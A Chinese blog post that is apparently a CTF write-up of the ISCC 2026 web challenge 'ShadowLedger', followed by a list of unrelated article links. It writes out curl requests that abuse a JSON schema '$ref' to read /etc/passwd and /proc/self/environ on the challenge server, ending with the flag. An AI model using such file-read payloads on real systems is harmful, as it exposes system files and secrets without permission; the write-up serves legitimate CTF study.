【2026】ISCC ShadowLedger

发布时间:2026/5/22 6:54:53
【2026】ISCC ShadowLedger ShadowLedger题目类型web先注册和登录存在admin用户39.105.213.28:12606/dashboard发现有以下功能Template consoleReports在这里发现权限不够返回看下用户会话信息看到两个api接口/api/template/import,/api/template/preview查看到用户会话信息user:{uid:1932,username:willson,role:auditor},routes:[/api/template/import,/api/template/preview]}没有线索目前只有templates可以访问输入口可能有漏洞。查看页面发现/static/app.js路径访问关键代码async function preview() { const schemaText document.querySelector(#schema).value; let schema JSON.parse(schemaText); const result await api(/api/template/preview, {schema}); // ... }/api/template/preview后端接口这是json schema外部引用漏洞($ref任意文件读取)输入的json原封不动发给后端。curl -X POST http://39.105.213.28:12606/api/template/preview \ -H Content-Type: application/json \ -H Cookie: sl_sessioneyJ1aWQiOjE5MzIsInVzZXJuYW1lIjoid2lsbHNvbiIsInJvbGUiOiJhdWRpdG9yIn0.aPMIGp2ewwCy919GzVGeANiYBB0PkrSRuAc67VNqCnw \ -d {schema:{$ref:file:///etc/passwd}}输入这个成功读取到/etc/passwd文件这道题已经解完了漏洞就是这个。遍历应用每个地方发现写这个curl -X POST http://39.105.213.28:12606/api/template/preview -H Content-Type: application/json -H Cookie: sl_sessioneyJ1aWQiOjE5MzIsInVzZXJuYW1lIjoid2lsbHNvbiIsInJvbGUiOiJhdWRpdG9yIn0.aPMIGp2ewwCy919GzVGeANiYBB0PkrSRuAc67VNqCnw -d {schema:{$ref:file:///proc/self/environ}}flag:ISCC{black_box_schema_ref_to_shadow_vault_2026}async function preview() {const schemaText document.querySelector(#schema).value;let schema JSON.parse(schemaText);const result await api(/api/template/preview, {schema});// ...}

相关新闻

LabVIEW水泵异常智能检测

LabVIEW水泵异常智能检测

2026/5/22 6:53:52
基于深度学习YOLO26算法的矿山煤炭输送场景目标检测传送带物料异常检测

基于深度学习YOLO26算法的矿山煤炭输送场景目标检测传送带物料异常检测

2026/5/22 6:53:52
Linux动态debug使用方法

Linux动态debug使用方法

2026/5/22 6:52:32
海外网红营销AI skills到底是什么?2026年出海品牌选型指南

海外网红营销AI skills到底是什么?2026年出海品牌选型指南

2026/5/22 7:57:39
如何用AI瞄准技术实现职业级游戏体验:从零开始的完整配置指南

如何用AI瞄准技术实现职业级游戏体验:从零开始的完整配置指南

2026/5/22 7:57:39
G-Helper:华硕笔记本轻量化硬件控制框架技术解析

G-Helper:华硕笔记本轻量化硬件控制框架技术解析

2026/5/22 7:56:18
Unity空引用报错本质与系统化排查指南

Unity空引用报错本质与系统化排查指南

2026/5/22 7:55:58
Unity像素风受击刀光特效实现方案

Unity像素风受击刀光特效实现方案

2026/5/22 7:55:38
AV1编码背景及现状

AV1编码背景及现状

2026/5/22 7:55:17
状态机——SpringStateMachine嵌套状态流转

状态机——SpringStateMachine嵌套状态流转

2026/5/22 0:01:47
终极Windows 11优化指南:如何用开源工具彻底清理系统冗余

终极Windows 11优化指南:如何用开源工具彻底清理系统冗余

2026/5/22 0:02:28
利用TaoToken模型广场为不同文本处理任务选择性价比最优模型

利用TaoToken模型广场为不同文本处理任务选择性价比最优模型

2026/5/22 0:02:48
基于CircuitPython与运动传感器的智能LED滑雪板灯光系统全解析

基于CircuitPython与运动传感器的智能LED滑雪板灯光系统全解析

2026/5/21 20:09:33
app扫描wifi的时候需要打开GPS定位----否则扫不到

app扫描wifi的时候需要打开GPS定位----否则扫不到

2026/5/20 16:30:16
使用辅助权限登录wifi

使用辅助权限登录wifi

2026/5/20 16:30:16
从stress到stress-ng:一文搞懂Linux压力测试工具怎么选?实战对比CPU/内存/磁盘压测效果

从stress到stress-ng:一文搞懂Linux压力测试工具怎么选?实战对比CPU/内存/磁盘压测效果

2026/5/22 7:22:24
从TTL到eDP:嵌入式工程师选屏接口的实战避坑指南(附信号实测对比)

从TTL到eDP:嵌入式工程师选屏接口的实战避坑指南(附信号实测对比)

2026/5/21 7:55:09
实测 Taotoken 多模型路由的响应延迟与稳定性体感

实测 Taotoken 多模型路由的响应延迟与稳定性体感

2026/5/20 16:20:46